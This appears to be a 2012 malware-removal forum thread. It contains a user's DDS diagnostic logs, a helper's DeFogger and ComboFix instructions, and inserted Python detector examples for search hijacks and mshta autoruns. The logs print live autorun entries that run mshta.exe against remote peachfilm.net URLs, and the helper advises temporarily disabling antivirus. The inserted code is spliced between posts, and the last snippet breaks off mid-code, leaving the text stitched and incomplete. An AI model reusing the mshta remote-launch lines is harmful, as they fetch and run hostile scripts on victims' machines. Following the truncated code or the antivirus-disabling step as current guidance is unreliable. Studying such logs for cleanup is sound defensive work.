    TB: {A057A204-BACC-4D26-9990-79A187E2698E} - No File
    TB: {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - No File
    uRun: [Sidebar] c:\program files\windows sidebar\sidebar.exe /autoRun
    uRun: [<NO NAME>]
    uRun: [Google Update] "c:\users\gagan\appdata\local\google\update\GoogleUpdate.exe" /c
    uRun: [DAEMON Tools Lite] "c:\program files\daemon tools lite\daemon.exe"
    uRun: [Yahoo! Pager] "c:\progra~1\yahoo!\messen~1\YAHOOM~1.EXE" -quiet
    uRun: [SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://peachfilm.net/reg2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP&log=1
    uRun: [RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://peachfilm.net/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP
    uRunOnce: [RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://peachfilm.net/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP
    mRun: [RtHDVCpl] RtHDVCpl.exe
    mRun: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
    mRun: [Apoint] c:\program files\apoint2k\Apoint.exe
    mRun: [Skytel] Skytel.exe
    mRun: [Adobe Reader Speed Launcher] "c:\program files\adobe\reader 8.0\reader\Reader_sl.exe"
    mRun: [00TCrdMain] %ProgramFiles%\TOSHIBA\FlashCards\TCrdMain.exe
    mRun: [SynTPEnh] c:\program files\synaptics\syntp\SynTPEnh.exe
    mRun: [QuickTime Task] "c:\program files\quicktime\QTTask.exe" -atboottime
    mRun: [TkBellExe] "c:\program files\real\realplayer\update\realsched.exe" -osboot
    mRun: [DivXUpdate] "c:\program files\divx\divx update\DivXUpdate.exe" /CHECKNOW
    mRun: [SunJavaUpdateSched] "c:\program files\common files\java\java update\jusched.exe"
    mRun: [APSDaemon] "c:\program files\common files\apple\apple application support\APSDaemon.exe"
    mRun: [iTunesHelper] "c:\program files\itunes\iTunesHelper.exe"
    mRun: [MSC] "c:\program files\microsoft security client\msseces.exe" -hide -runkey
    dRun: [Picasa Media Detector] c:\program files\picasa2\PicasaMediaDetector.exe
    mPolicies-explorer: BindDirectlyToPropertySetStorage = 0 (0x0)
    mPolicies-system: EnableUIADesktopToggle = 0 (0x0)
    mPolicies-system: EnableLinkedConnections = 1 (0x1)
    IE: {77BF5300-1474-4EC7-9980-D32B190E9B07} - {77BF5300-1474-4EC7-9980-D32B190E9B07} - c:\program files\skype\toolbars\internet explorer\SkypeIEPlugin.dll
    LSP: c:\windows\system32\wpclsp.dll
    DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_03-windows-i586.cab
    DPF: {CAFEEFAC-0016-0000-0029-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_29-windows-i586.cab
    DPF: {CAFEEFAC-0017-0000-0003-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_03-windows-i586.cab
    DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_03-windows-i586.cab
    TCP: DhcpNameServer = 192.168.1.1
    TCP: Interfaces\{AA0BA040-CE6A-4F94-8BD1-7AFDC60B8156} : DhcpNameServer = 192.168.1.1
    Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\progra~1\mcafee\sitead~1\McIEPlg.dll
    Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\progra~1\mcafee\sitead~1\McIEPlg.dll
    Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - c:\progra~1\common~1\skype\SKYPE4~1.DLL
    .
    ================= FIREFOX ===================
    .
    FF - ProfilePath - c:\users\gagan\appdata\roaming\mozilla\firefox\profiles\bav5d5wt.default\
    FF - prefs.js: browser.search.selectedEngine - GoogIe
    FF - prefs.js: browser.startup.homepage - hxxp://www.aol.com/
    FF - prefs.js: keyword.URL - hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3072254&SearchSource=2&q=
    FF - component: c:\program files\mcafee\siteadvisor\components\McFFPlg.dll
    FF - plugin: c:\program files\divx\divx ovs helper\npovshelper.dll
    FF - plugin: c:\program files\divx\divx plus web player\npdivx32.dll
    FF - plugin: c:\program files\mcafee\siteadvisor\NPMcFFPlg32.dll
    FF - plugin: c:\program files\microsoft silverlight\4.1.10329.0\npctrlui.dll
    FF - plugin: c:\program files\mozilla firefox\plugins\npPandoWebInst.dll
    FF - plugin: c:\program files\mozilla firefox\plugins\NPTURNMED.dll
    FF - plugin: c:\program files\oracle\javafx 2.0 runtime\bin\plugin2\npjp2.dll
    FF - plugin: c:\program files\veoh networks\veoh\plugins\noreg\NPVeohVersion.dll
    FF - plugin: c:\program files\veoh networks\veohwebplayer\npWebPlayerVideoPluginATL.dll
    FF - plugin: c:\programdata\real\realplayer\browserrecordplugin\mozillaplugins\nprpchromebrowserrecordext.dll
    FF - plugin: c:\programdata\real\realplayer\browserrecordplugin\mozillaplugins\nprphtml5videoshim.dll
    FF - plugin: c:\users\gagan\appdata\local\google\update\1.3.21.111\npGoogleUpdate3.dll
    FF - plugin: c:\users\gagan\appdata\locallow\unity\webplayer\loader\npUnity3D32.dll
    FF - plugin: c:\users\gagan\appdata\roaming\mozilla\plugins\npgoogletalk.dll
    FF - plugin: c:\users\gagan\appdata\roaming\mozilla\plugins\npgtpo3dautoplugin.dll
    FF - plugin: c:\windows\system32\macromed\flash\NPSWF32_11_2_202_235.dll
    FF - plugin: c:\windows\system32\npDeployJava1.dll
    FF - plugin: c:\windows\system32\npmproxy.dll
    .
    ---- FIREFOX POLICIES ----
    .
    FF - user.js: browser.search.selectedEngine - GoogIe
    FF - user.js: keyword.URL - hxxp://www.theast.com/search/?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&rls=sIjcOCzt&q=
    FF - user.js: yahoo.homepage.dontask - true
    ============= SERVICES / DRIVERS ===============
    .
    R0 MpFilter;Microsoft Malware Protection Driver;c:\windows\system32\drivers\MpFilter.sys [2012-3-20 171064]
    R1 MpKsl0ef4776f;MpKsl0ef4776f;c:\programdata\microsoft\microsoft antimalware\definition updates\{a66fbb99-c8ac-44bc-83f6-4037b1f477f7}\MpKsl0ef4776f.sys [2012-5-28 29904]
    R2 FontCache;Windows Font Cache Service;c:\windows\system32\svchost.exe -k LocalServiceAndNoImpersonation [2008-6-19 21504]
    R2 McAfee SiteAdvisor Service;McAfee SiteAdvisor Service;c:\progra~1\mcafee\sitead~1\mcsacore.exe [2011-5-24 95200]
    R2 TeamViewer6;TeamViewer 6;c:\program files\teamviewer\version6\TeamViewer_Service.exe [2011-1-27 2253688]
    S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\microsoft.net\framework\v4.0.30319\mscorsvw.exe [2010-3-18 130384]
    S3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service;c:\windows\system32\macromed\flash\FlashPlayerUpdateService.exe [2012-4-7 257696]
    S3 NisDrv;Microsoft Network Inspection System;c:\windows\system32\drivers\NisDrvWFP.sys [2012-3-20 74112]
    S3 NisSrv;Microsoft Network Inspection;c:\program files\microsoft security client\NisSrv.exe [2012-3-26 214952]
    S3 WPFFontCache_v0400;Windows Presentation Foundation Font Cache 4.0.0.0;c:\windows\microsoft.net\framework\v4.0.30319\wpf\WPFFontCache_v0400.exe [2010-3-18 753504]
    S3 WSDPrintDevice;WSD Print Support via UMB;c:\windows\system32\drivers\WSDPrint.sys [2008-6-19 16896]
    S4 dldt_device;dldt_device;c:\windows\system32\dldtcoms.exe -service --> c:\windows\system32\dldtcoms.exe -service [?]
    S4 dldtCATSCustConnectService;dldtCATSCustConnectService;c:\windows\system32\spool\drivers\w32x86\3\dldtserv.exe [2009-7-9 98984]
    S4 Giraffic;Veoh Giraffic Video Accelerator;c:\program files\giraffic\veoh_girafficwatchdog.exe --service --> c:\program files\giraffic\Veoh_GirafficWatchdog.exe --service [?]
    S4 StarWindServiceAE;StarWind AE Service;c:\program files\alcohol soft\alcohol 52\starwind\StarWindServiceAE.exe [2007-5-28 275968]
    .
    =============== Created Last 30 ================
    .
    2012-05-28 05:57:08 29904 ----a-w- c:\programdata\microsoft\microsoft antimalware\definition updates\{a66fbb99-c8ac-44bc-83f6-4037b1f477f7}\MpKsl0ef4776f.sys
    2012-05-28 05:06:52 6737808 ----a-w- c:\programdata\microsoft\microsoft antimalware\definition updates\{a66fbb99-c8ac-44bc-83f6-4037b1f477f7}\mpengine.dll
    2012-05-23 20:07:25 6737808 ------w- c:\programdata\microsoft\microsoft antimalware\definition updates\backup\mpengine.dll
    2012-05-22 05:16:47 713784 ------w- c:\programdata\microsoft\microsoft antimalware\definition updates\{f78cef23-eb95-4ded-8458-48e319614326}\gapaengine.dll
    2012-05-22 05:09:57 -------- d-----w- c:\program files\Microsoft Security Client
    2012-05-19 08:37:25 6737808 ----a-w- c:\programdata\microsoft\windows defender\definition updates\{3070ec37-30ca-43ae-ac15-bbe0716a8aad}\mpengine.dll
    2012-05-19 05:43:51 -------- d-----w- c:\programdata\vsint
    2012-05-14 22:57:56 53120 ----a-w- c:\windows\system32\drivers\partmgr.sys
    2012-05-14 22:57:42 914304 ----a-w- c:\windows\system32\drivers\tcpip.sys
    2012-05-14 22:57:41 31232 ----a-w- c:\windows\system32\drivers\tcpipreg.sys
    2012-05-14 22:57:34 1404928 ----a-w- c:\program files\common files\microsoft shared\ink\InkObj.dll
    2012-05-14 22:57:32 936960 ----a-w- c:\program files\common files\microsoft shared\ink\journal.dll
    2012-05-14 22:57:20 1069056 ----a-w- c:\windows\system32\DWrite.dll
    2012-05-14 22:57:19 219648 ----a-w- c:\windows\system32\d3d10_1core.dll
    2012-05-14 22:57:19 1172480 ----a-w- c:\windows\system32\d3d10warp.dll
    2012-05-14 22:57:18 683008 ----a-w- c:\windows\system32\d2d1.dll
    2012-05-14 22:57:18 160768 ----a-w- c:\windows\system32\d3d10_1.dll
    2012-05-14 22:56:51 3550080 ----a-w- c:\windows\system32\ntoskrnl.exe
    2012-05-14 22:56:50 3602816 ----a-w- c:\windows\system32\ntkrnlpa.exe
    2012-05-14 22:56:49 2044928 ----a-w- c:\windows\system32\win32k.sys
    2012-05-09 04:58:39 592824 ----a-w- c:\program files\mozilla firefox\gkmedias.dll
    2012-05-09 04:58:39 44472 ----a-w- c:\program files\mozilla firefox\mozglue.dll
    .
    ==================== Find3M ====================
    .
    2012-05-05 06:08:36 70304 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
    2012-05-05 06:08:36 419488 ----a-w- c:\windows\system32\FlashPlayerApp.exe
    2012-04-04 19:56:40 22344 ----a-w- c:\windows\system32\drivers\mbam.sys
    2012-03-21 00:44:12 74112 ----a-w- c:\windows\system32\drivers\NisDrvWFP.sys
    2012-03-21 00:44:12 171064 ----a-w- c:\windows\system32\drivers\MpFilter.sys
    2012-02-29 15:11:45 5120 ----a-w- c:\windows\system32\wmi.dll
    2012-02-29 15:11:42 172032 ----a-w- c:\windows\system32\wintrust.dll
    2012-02-29 15:09:53 157696 ----a-w- c:\windows\system32\imagehlp.dll
    2012-02-29 13:32:37 12800 ----a-w- c:\windows\system32\drivers\fs_rec.sys
    2012-02-28 11:30:48 916992 ----a-w- c:\windows\system32\wininet.dll
    2012-02-28 11:25:41 43520 ----a-w- c:\windows\system32\licmgr10.dll
    2012-02-28 11:25:17 1469440 ----a-w- c:\windows\system32\inetcpl.cpl
    2012-02-28 11:25:03 71680 ----a-w- c:\windows\system32\iesetup.dll
    2012-02-28 11:25:03 109056 ----a-w- c:\windows\system32\iesysprep.dll
    2012-02-28 10:07:57 385024 ----a-w- c:\windows\system32\html.iec
    2012-02-28 08:12:52 133632 ----a-w- c:\windows\system32\ieUnatt.exe
    2012-02-28 08:08:30 1638912 ----a-w- c:\windows\system32\mshtml.tlb
    .
    ============= FINISH: 3:18:17.35 ===============
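The FIREFOX POLICIES block in the log above records a selected search engine spelled "GoogIe" (a capital I standing in for the l) and a keyword.URL that sends address-bar searches to www.theast.com instead of the engine the user thinks is selected; both are classic search-hijack markers. The Python below is an added example, not part of the thread and not DDS code: it parses the `FF - user.js:` lines as DDS prints them, folds look-alike glyphs to unmask the engine name, and flags a keyword.URL host that is not on a short allow-list. The engine list, the allow-list and the confusable table are assumptions chosen for the example; the sample input is constructed from the three lines in the log.

```python
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlparse

# DDS prints Firefox user.js overrides as:  FF - user.js: <pref> - <value>
DDS_PREF_RE = re.compile(
    r"^\s*FF - user\.js:\s*(?P<pref>[\w.]+)\s+-\s+(?P<value>.*?)\s*$"
)

# Engines a hijacker is likely to impersonate, and where address-bar searches
# for them legitimately go. Both sets are assumptions for this example.
KNOWN_ENGINES = {"google", "yahoo", "bing", "duckduckgo"}
LEGIT_SEARCH_HOSTS = {"www.google.com", "google.com", "search.yahoo.com", "www.bing.com"}
# Glyphs that render like the real letter; folding them exposes the lookalike.
CONFUSABLES = str.maketrans({"I": "l", "1": "l", "|": "l", "0": "o"})

# Constructed sample: the FIREFOX POLICIES lines from the log in this thread.
SAMPLE_DDS = """
    ---- FIREFOX POLICIES ----
    .
    FF - user.js: browser.search.selectedEngine - GoogIe
    FF - user.js: keyword.URL - hxxp://www.theast.com/search/?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&rls=sIjcOCzt&q=
    FF - user.js: yahoo.homepage.dontask - true
"""


def refang(url: str) -> str:
    """Turn the log's defanged hxxp:// back into http:// so urlparse sees a host."""
    return re.sub(r"^hxxp(s?)://", r"http\1://", url, flags=re.IGNORECASE)


def parse_dds_user_js(text: str) -> Dict[str, str]:
    """Collect pref -> value from every 'FF - user.js:' line in a DDS log."""
    prefs: Dict[str, str] = {}
    for line in text.splitlines():
        m = DDS_PREF_RE.match(line)
        if m:
            prefs[m.group("pref")] = m.group("value")
    return prefs


def lookalike_engine(name: str) -> Optional[str]:
    """Return the real engine `name` impersonates via confusable glyphs, else None."""
    if name.lower() in KNOWN_ENGINES:
        return None                      # spelled correctly: nothing to unmask
    folded = name.translate(CONFUSABLES).lower()
    return folded if folded in KNOWN_ENGINES else None


def audit_prefs(prefs: Dict[str, str]) -> List[Tuple[str, str]]:
    """Flag a lookalike engine name and a keyword.URL that leaves the allow-list."""
    findings: List[Tuple[str, str]] = []
    engine = prefs.get("browser.search.selectedEngine")
    if engine:
        target = lookalike_engine(engine)
        if target:
            findings.append(("lookalike-engine", f"{engine} impersonates {target}"))
    keyword_url = prefs.get("keyword.URL")
    if keyword_url:
        host = urlparse(refang(keyword_url)).hostname or ""
        if host not in LEGIT_SEARCH_HOSTS:
            findings.append(("keyword-url-hijack", host))
    return findings


if __name__ == "__main__":
    for kind, detail in audit_prefs(parse_dds_user_js(SAMPLE_DDS)):
        print(f"{kind}: {detail}")
```

The engine check is deliberately a glyph fold rather than an edit-distance match: "GoogIe" is visually identical to "Google" in most fonts, which is the whole point of the trick, and a fold catches it without also flagging legitimately different engine names.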
     
  6. gagraptor

    gagraptor Thread Starter

    Joined:
    May 23, 2012
    Messages:
    31
    .
    UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
    IF REQUESTED, ZIP IT UP & ATTACH IT
    .
    DDS (Ver_2011-08-26.01)
    .
    Microsoft® Windows Vista™ Home Premium
    Boot Device: \Device\HarddiskVolume2
    Install Date: 7/31/2007 3:06:08 PM
    System Uptime: 5/28/2012 1:45:32 AM (2 hours ago)
    .
    Motherboard: TOSHIBA | | IALAA
    Processor: AMD Turion(tm) 64 X2 Mobile Technology TL-56 | Socket M2/S1G1 | 1800/200mhz
    .
    ==== Disk Partitions =========================
    .
    C: is FIXED (NTFS) - 231 GiB total, 26.845 GiB free.
    E: is CDROM ()
    F: is CDROM ()
    G: is CDROM ()
    .
    ==== Disabled Device Manager Items =============
    .
    Class GUID: {4d36e972-e325-11ce-bfc1-08002be10318}
    Description: Microsoft 6to4 Adapter
    Device ID: ROOT\*6TO4MP\0000
    Manufacturer: Microsoft
    Name: Microsoft 6to4 Adapter
    PNP Device ID: ROOT\*6TO4MP\0000
    Service: tunnel
    .
    Class GUID: {4d36e972-e325-11ce-bfc1-08002be10318}
    Description: Microsoft Tun Miniport Adapter
    Device ID: ROOT\*TUNMP\0001
    Manufacturer: Microsoft
    Name: Teredo Tunneling Pseudo-Interface
    PNP Device ID: ROOT\*TUNMP\0001
    Service: tunmp
    .
    Class GUID: {6bdd1fc6-810f-11d0-bec7-08002be2092f}
    Description: Canon MX860 ser Network
    Device ID: ROOT\CANON_IJ_NETWORK\0000
    Manufacturer: Canon
    Name: Canon MX860 ser Network
    PNP Device ID: ROOT\CANON_IJ_NETWORK\0000
    Service: StillCam
    .
    ==== System Restore Points ===================
    .
    .
    ==== Installed Programs ======================
    .
    µTorrent
    Adobe Flash Player 11 Plugin
    Adobe Flash Player ActiveX
    Adobe Reader 8.1.5
    Adobe Shockwave Player
    Adobe® Photoshop® Album Starter Edition 3.2
    AGEIA PhysX v7.07.09
    Akamai NetSession Interface
    Akamai NetSession Interface Service
    ALPS Touch Pad Driver
    Apple Application Support
    Apple Mobile Device Support
    Apple Software Update
    Atheros Driver Installation Program
    ATI Catalyst Install Manager
    ATI Uninstaller
    Bejeweled Deluxe 1.87
    Bonjour
    Camera Assistant Software for Toshiba
    Canon IJ Network Scan Utility
    Canon IJ Network Tool
    Canon MX860 series MP Drivers
    Catalyst Control Center - Branding
    Catalyst Control Center Core Implementation
    Catalyst Control Center Graphics Full Existing
    Catalyst Control Center Graphics Full New
    Catalyst Control Center Graphics Light
    Catalyst Control Center Graphics Previews Vista
    Catalyst Control Center Localization Chinese Standard
    Catalyst Control Center Localization Chinese Traditional
    Catalyst Control Center Localization Dutch
    Catalyst Control Center Localization Finnish
    Catalyst Control Center Localization French
    Catalyst Control Center Localization German
    Catalyst Control Center Localization Greek
    Catalyst Control Center Localization Hungarian
    Catalyst Control Center Localization Italian
    Catalyst Control Center Localization Japanese
    Catalyst Control Center Localization Korean
    Catalyst Control Center Localization Norwegian
    Catalyst Control Center Localization Polish
    Catalyst Control Center Localization Portuguese
    Catalyst Control Center Localization Russian
    Catalyst Control Center Localization Spanish
    Catalyst Control Center Localization Swedish
    Catalyst Control Center Localization Thai
    Catalyst Control Center Localization Turkish
    ccc-core-static
    ccc-utility
    CCC Help Chinese Standard
    CCC Help Chinese Traditional
    CCC Help Czech
    CCC Help Danish
    CCC Help Dutch
    CCC Help English
    CCC Help Finnish
    CCC Help French
    CCC Help German
    CCC Help Greek
    CCC Help Hungarian
    CCC Help Italian
    CCC Help Japanese
    CCC Help Korean
    CCC Help Norwegian
    CCC Help Polish
    CCC Help Portuguese
    CCC Help Russian
    CCC Help Spanish
    CCC Help Swedish
    CCC Help Thai
    CCC Help Turkish
    CCleaner
    CD/DVD Drive Acoustic Silencer
    CloneDVD2
    Counter-Strike 1.0
    Counter-Strike 1.6
    Counter Strike 1.6 - By PirocaHP.F!N4LShare
    Counter Strike 1.6 - Pack 112 Mapas - By PirocaHP F!N4LShare
    D3DX10
    Dell Driver Download Manager
    Dell V305
    DivX Converter
    DivX Plus DirectShow Filters
    DivX Setup
    DivX Version Checker
    DVD MovieFactory for TOSHIBA
    DVDFab (Platinum/Gold/HD Decrypter) (Option: Mobile) 5.0.9.0
    EA SPORTS(TM) Cricket 07
    EPSON Easy Photo Print
    EPSON WorkForce 30 Series Printer Uninstall
    Google Chrome
    Google Talk (remove only)
    Google Talk Plugin
    HD Tune 2.55
    Hotfix for Microsoft .NET Framework 3.5 SP1 (KB953595)
    Hotfix for Microsoft .NET Framework 3.5 SP1 (KB958484)
    iPhone Configuration Utility
    iTunes
    Java Auto Updater
    Java(TM) 6 Update 29
    Java(TM) 7 Update 3
    Java(TM) SE Development Kit 7 Update 2
    Java(TM) SE Runtime Environment 6
    JavaFX 2.0.2 SDK
    JavaFX 2.0.3
    K-Lite Mega Codec Pack 6.2.0
    KB408682
    Magic DVD Ripper V5.1.1
    Magic ISO Maker v5.5 (build 0272)
    Malwarebytes Anti-Malware version 1.61.0.1400
    Max Payne
    McAfee SiteAdvisor
    Media Player Classic - Home Cinema v. 1.3.1249.0
    Microsoft .NET Framework 3.5 SP1
    Microsoft .NET Framework 4 Client Profile
    Microsoft Application Error Reporting
    Microsoft Flight Simulator X
    Microsoft Office XP Professional with FrontPage
    Microsoft Primary Interoperability Assemblies 2005
    Microsoft Security Client
    Microsoft Security Essentials
    Microsoft Silverlight
    Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053
    Microsoft Visual C++ 2005 Redistributable
    Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
    Microsoft Works
    Microsoft XML Parser
    Mozilla Firefox 11.0 (x86 en-US)
    MSVC80_x86
    MSVCRT
    MSXML 4.0 SP2 (KB927978)
    MSXML 4.0 SP2 (KB936181)
    MSXML 4.0 SP2 (KB941833)
    MSXML 4.0 SP2 (KB954430)
    MSXML 4.0 SP2 (KB973688)
    MSXML 4.0 SP2 Parser and SDK
    Need for Speed Underground 2
    Need for Speed™ Most Wanted
    Nero BackItUp
    Nero BackItUp and Burn
    Nero BurnRights
    Nero Express
    Nero RescueAgent
    neroxml
    Oblivion
    OGA Notifier 2.0.0048.0
    Pando Media Booster
    PC Connectivity Solution
    PCFriendly
    Picasa 2
    QuickTime
    RealNetworks - Microsoft Visual C++ 2008 Runtime
    Realtek 8169 PCI, 8168 and 8101E PCIe Ethernet Network Card Driver for Windows Vista
    Realtek High Definition Audio Driver
    RealUpgrade 1.1
    Safari
    Security Update for Microsoft .NET Framework 3.5 SP1 (KB2604111)
    Security Update for Microsoft .NET Framework 3.5 SP1 (KB2657424)
    Security Update for Microsoft .NET Framework 4 Client Profile (KB2446708)
    Security Update for Microsoft .NET Framework 4 Client Profile (KB2478663)
    Security Update for Microsoft .NET Framework 4 Client Profile (KB2518870)
    Security Update for Microsoft .NET Framework 4 Client Profile (KB2539636)
    Security Update for Microsoft .NET Framework 4 Client Profile (KB2572078)
    Security Update for Microsoft .NET Framework 4 Client Profile (KB2604121)
    Security Update for Microsoft .NET Framework 4 Client Profile (KB2633870)
    Security Update for Microsoft .NET Framework 4 Client Profile (KB2656351)
    Security Update for Microsoft .NET Framework 4 Client Profile (KB2656368)
    Security Update for Microsoft .NET Framework 4 Client Profile (KB2656405)
    Security Update for Windows Media Encoder (KB2447961)
    Security Update for Windows Media Encoder (KB954156)
    Security Update for Windows Media Encoder (KB979332)
    Segoe UI
    Skins
    Skype™ 3.5
    Spelling Dictionaries Support For Adobe Reader 8
    Switch Sound File Converter
    Synaptics Pointing Device Driver
    Tales of Monkey Island
    TeamViewer 6
    Texas Instruments PCIxx21/x515/xx12 drivers.
    TIPCI
    TOSHIBA Assist
    TOSHIBA Disc Creator
    TOSHIBA DVD PLAYER
    TOSHIBA Extended Tiles for Windows Mobility Center
    TOSHIBA Flash Cards Support Utility
    TOSHIBA Hardware Setup
    Toshiba Registration
    TOSHIBA SD Memory Utilities
    TOSHIBA Software Modem
    TOSHIBA Software Upgrades
    TOSHIBA Supervisor Password
    TOSHIBA Value Added Package
    TuneUp Companion 2.2.7
    TypingMaster Pro
    Unity Web Player
    Update for Microsoft .NET Framework 3.5 SP1 (KB963707)
    Update for Microsoft .NET Framework 4 Client Profile (KB2468871)
    Update for Microsoft .NET Framework 4 Client Profile (KB2533523)
    Update for Microsoft .NET Framework 4 Client Profile (KB2600217)
    Utility Common Driver
    uTorrentControl Toolbar
    VC80CRTRedist - 8.0.50727.6195
    VCRedistSetup
    Veoh Giraffic Video Accelerator
    Veoh Web Player
    VeohTV BETA
    VideoLAN VLC media player 0.8.6f
    Windows Live Communications Platform
    Windows Live Essentials
    Windows Live ID Sign-in Assistant
    Windows Live Installer
    Windows Live Messenger
    Windows Live Photo Common
    Windows Live PIMT Platform
    Windows Live SOXE
    Windows Live SOXE Definitions
    Windows Live UX Platform
    Windows Live UX Platform Language Pack
    Windows Media Encoder 9 Series
    Windows Media Player Firefox Plugin
    WinImage
    WinRAR archiver
    Yahoo! Detect
    Yahoo! Install Manager
    Yahoo! Messenger
    Zeus & Poseidon
    .
    ==== Event Viewer Messages From Past Week ========
    .
    5/28/2012 12:57:13 AM, Error: Microsoft-Windows-SharedAccess_NAT [31004] - The DNS proxy agent was unable to allocate 0 bytes of memory. This may indicate that the system is low on virtual memory, or that the memory manager has encountered an internal error.
    5/28/2012 1:48:09 AM, Error: Microsoft-Windows-DistributedCOM [10016] - The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID {C97FCC79-E628-407D-AE68-A06AD6D8B4D1} to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC). This security permission can be modified using the Component Services administrative tool.
    5/28/2012 1:47:38 AM, Error: Service Control Manager [7000] - The Parallel port driver service failed to start due to the following error: The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.
    5/28/2012 1:47:31 AM, Error: PlugPlayManager [12] - The device 'PIONEER DVD-RW DVR-K17LF ATA Device' (IDE\CdRomPIONEER_DVD-RW_DVR-K17LF________________4.53____\5&383a5e59&0&0.0.0) disappeared from the system without first being prepared for removal.
    5/28/2012 1:47:27 AM, Error: cdrom [15] - The device, \Device\CdRom0, is not ready for access yet.
    5/28/2012 1:47:27 AM, Error: atapi [11] - The driver detected a controller error on \Device\Ide\IdePort2.
    5/23/2012 3:53:51 PM, Error: EventLog [6008] - The previous system shutdown at 3:52:17 PM on 5/23/2012 was unexpected.
    .
    ==== End Of File ===========================
     
  7. gagraptor

    gagraptor Thread Starter

    Joined:
    May 23, 2012
    Messages:
    31
    Also, I don't know if it helps, but my physical memory usage is always above 50%.
     
  8. Mark1956

    Mark1956 Malware Specialist

    Joined:
    May 7, 2011
    Messages:
    14,142
    Ok, thanks for the logs. Please now follow this to run Combofix and post the log.

    IMPORTANT
    I see you have a P2P File Sharing Program installed on your system: uTorrent.
    As long as you continue to use these types of programs you can expect to get infected.
    P2P file sharing is one of the most common sources for picking up infections.
    Please uninstall the program from your system in Programs & Features via the Control Panel.
    If you insist on keeping it on your system then please DO NOT USE IT until we are finished.

    STEP 1

    NOTE: If you have already used Combofix please delete the icon from your desktop.
    • Please download DeFogger and save it to your desktop.
    • Once downloaded, double-click on the DeFogger icon to start the tool.
    • The application window will appear.
    • You should now click on the Disable button to disable your CD Emulation drivers.
    • When it prompts you whether or not you want to continue, please click on the Yes button to continue.
    • When the program has completed you will see a Finished! message. Click on the OK button to exit the program.
    • If CD Emulation programs are present and have been disabled, DeFogger will now ask you to reboot the machine. Please allow it to do so by clicking on the OK button.
    STEP 2

    Please download ComboFix from one of the locations below and save it to your Desktop. <-Important!!!
    Be sure to print out and follow these instructions: A guide and tutorial on using ComboFix

    Vista/Windows 7 users can skip the Recovery Console instructions and use the Windows DVD to boot into the Vista Recovery Environment or Windows 7 System Recovery Options if something goes awry. If you do not have a Windows 7 DVD then please create a Windows 7 Repair Disc. XP users need to install the Recovery Console first.
    • Temporarily disable your anti-virus, script blocking and any anti-malware real-time protection before performing a scan. They can interfere with ComboFix or remove some of its embedded files which may cause "unpredictable results". Click this link to see a list of such programs and how to disable them.
    • If ComboFix detects an older version of itself, you will be asked to update the program.
    • ComboFix will begin by showing a Disclaimer. Read it and click I Agree if you want to continue.
    • Follow the prompts and click on Yes to continue scanning for malware.
    • If using Windows 7 or Vista and you receive a UAC prompt asking if you want to continue running the program, you should press the Continue button.
    • When finished, please copy and paste the contents of C:\ComboFix.txt (which will open after reboot) in your next reply.
    • Be sure to re-enable your anti-virus and other security programs.
    -- Do not touch your mouse/keyboard until the ComboFix scan has completed, as this may cause the process to stall or the computer to lock.
    -- ComboFix will temporarily disable your desktop, and if interrupted may leave it disabled. If this occurs, please reboot to restore it.
    -- ComboFix disables autorun of all CD, floppy and USB devices to assist with malware removal and increase security.
    If you no longer have access to your Internet connection after running ComboFix, please reboot to restore it. If that does not restore the connection, then follow the instructions for Manually restoring the Internet connection provided in the "How to Guide" you printed out earlier.
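The popup this thread is about is mshta.exe being launched with a remote URL, and the ComboFix output that follows shows the persistence behind it: HKCU\...\Run values named SystemBoot<id> and RegWrite<id>, plus matching msconfig\startupreg entries, each running mshta.exe against a URL that carries a per-victim cccid. The Python below is an added example, not part of the thread and not ComboFix code: it scans a ComboFix-style "Reg Loading Points" dump and flags any autorun whose launcher is a script host such as mshta.exe, rating it high when a remote URL is present and review when the command is bare (the webvsint entry). The set of launcher binaries is an assumption; the sample dump is constructed from the hosts and victim id in the thread's own log.

```python
import re
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import parse_qs, urlparse

# Windows script hosts and proxy-execution binaries that will run remote content
# when handed a URL. This set is an assumption for the example; extend as needed.
REMOTE_CAPABLE_LOLBINS = {
    "mshta.exe", "mshta", "wscript.exe", "cscript.exe",
    "rundll32.exe", "regsvr32.exe", "powershell.exe",
}

KEY_RE = re.compile(r"^\s*\[(?P<key>[^\]]+)\]\s*$")
# ComboFix value line:  "name"="command" [date size]   or   "name"="command" [?]
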